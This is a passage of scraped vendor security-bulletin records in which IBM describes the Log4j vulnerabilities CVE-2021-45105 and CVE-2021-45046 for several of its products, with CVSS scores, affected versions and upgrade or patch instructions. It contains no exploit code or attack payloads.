\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.4 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.5 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-7\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-16T03:17:46", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-16T03:17:46", "id": "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "href": "https://www.ibm.com/support/pages/node/6538332", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:56:51", "description": "## Summary\n\nApache Log4j (CVE-2021-45105 and CVE-2021-45046) is used by the Monitoring component of IBM Cloud Pak for Multicloud Management as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Cloud Pak for Multicloud Management Monitoring| 2.3 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now** by upgrading to IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 4 by following the instructions at <https://www.ibm.com/docs/en/cloud-paks/cp-management/2.3.x?topic=upgrade-upgrading-fix-pack-3-4>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T12:49:17", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Multicloud Management is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T12:49:17", "id": "31818542FEE3EBA05F196E3245AADB3A27506A9391A7E39DC666A3A5AAEE4963", "href": "https://www.ibm.com/support/pages/node/6557424", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:56", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Informix Dynamic Server for IBM Informix HQ. IBM Informix Dynamic Server is vulnerable to denial of service (CVE-2021-45105) and remote code execution (CVE-2021-45046) due to Apache Log4j. The fix is included in Apache Log4j 2.17.1. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Informix Dynamic Server| 14.10 \nIBM Informix Dynamic Server| 12.10 \n \n\n\n## Remediation/Fixes\n\n**For 14.10 IBM Informix Dynamic Server** \n\n\n 1. Go to [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/Informix&release=14.10.FC7&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/Informix&release=14.10.FC7&platform=All&function=all>)\n 2. Download and install the **14.10.FC7W1** version for your platform which contains the fix in InformixHQ.\n\n**For 12.10 IBM Informix Dynamic Server** \n\n\n 1. Go to [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/Informix&release=12.10.FC15W1&platform=All&function=recommended](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/Informix&release=12.10.FC15W1&platform=All&function=recommended>)\n 2. Download and install the **12.10.FC15W1** version for your platform which contains the fix in InformixHQ. 
\n\nCustomers are encouraged to take immediate action by applying the fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T13:31:29", "type": "ibm", "title": "Security Bulletin: IBM Informix Dynamic Server is vulnerable to denial of service (CVE-2021-45105) and remote code execution (CVE-2021-45046) due to Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-15T13:31:29", "id": "10DF4536D86919652FFFFF08E8AC284AF696E6684CAF921DD9F5AB335A3882A9", "href": "https://www.ibm.com/support/pages/node/6572685", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:55:38", "description": "## Summary\n\nApache Log4j is used by IBM Db2 Big SQL as part of its logging infrastructure. IBM Db2 Big SQL is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105). 
The fix includes Apache Log4j 2.17.1\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nDb2 Big SQL on HDP, CDP| 6.0.0.0 \nDb2 Big SQL on HDP, CDP| 7.1.0.0 \nDb2 Big SQL on Cloud Pak for Data| 7.1.1 (on CP4D 3.5.0) \nDb2 Big SQL on Cloud Pak for Data| 7.2.0 (on CP4D 4.0.0) \nDb2 Big SQL on Cloud Pak for Data| 7.2.1 (on CP4D 4.0.1) \nDb2 Big SQL on Cloud Pak for Data| 7.2.2 (on CP4D 4.0.2) \nDb2 Big SQL on Cloud Pak for Data| 7.2.3 (on CP4D 4.0.3) \n \nHDP is Hortonworks Data Platform\n\nCDP is Cloudera Data Platform Private Cloud\n\n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading Affected Product(s)| Version(s)| Fixes \n---|---|--- \nDb2 Big SQL on Cloud Pak for Data| 7.1.1 (on CP4D 3.5.0)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6237854> \"instructions\" ) to apply Db2 Big SQL on CP4D 3.5 Patch 379 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.0 (on CP4D 4.0.0)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.1 (on CP4D 4.0.1)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.2 (on CP4D 4.0.2)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.3 (on CP4D 4.0.3)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \n## Workarounds and Mitigations\n\nIBM strongly suggest addressing the vulnerability now by applying the mitigation below \n\n**Product(s)**| **Version(s)**| \n\n**Remediation/Fix/Instructions** \n \n---|---|--- 
\nDb2 Big SQL on HDP, CDP| 6.0.0.0| Follow the [instructions](<https://www.ibm.com/support/pages/apar/PH42765> \"instructions\" ) to update the vulnerable library \nDb2 Big SQL on HDP, CDP| 7.1.0.0| Follow the [instructions](<https://www.ibm.com/support/pages/apar/PH42765> \"instructions\" ) to update the vulnerable library \n \nHDP is Hortonworks Data Platform\n\nCDP is Cloudera Data Platform Private Cloud\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:47:00", "type": "ibm", "title": "Security Bulletin: IBM Db2 Big SQL is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-22T16:47:00", "id": "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "href": "https://www.ibm.com/support/pages/node/6565401", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:10", "description": "## Summary\n\nIBM Data Management Platform for 
EnterpriseDB (EDB) Postgres Enterprise contains a component called EDB failover manager (EFM) and uses a version of log4j that impacts high availability in EDB. The upgraded EFM product contains Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Data Management Platform for EDB Postgres Enterprise| 1.0 \nIBM Data Management Platform for EDB Postgres Enterprise | 2.0 \n \n\n\n## Remediation/Fixes\n\nThis applies for all versions listed in this security bulletin: \n\nIf EFM is being used as a quorum / failover strategy for IBM Data Management Platform for EDB Postgres Enterprise, IBM strongly recommends addressing the vulnerability now by upgrading their versions of EFM to EDB Failover Manager version 4.4 which contains Apache Log4j 2.17.1.\n\nIf EFM is not being used no further action is needed.\n\nPlease review for information only - EnterpriseDB's EFM Technical Alert here: <https://support.enterprisedb.com/support/s/detail/a4V2J000001VJn1UAG>\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by upgrading the version of EFM (if being used) to the latest version 4.4 as noted in the remediation section above.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-02T19:47:50", "type": "ibm", "title": "Security Bulletin: IBM Data Management Platform for EDB Postgres Enterprise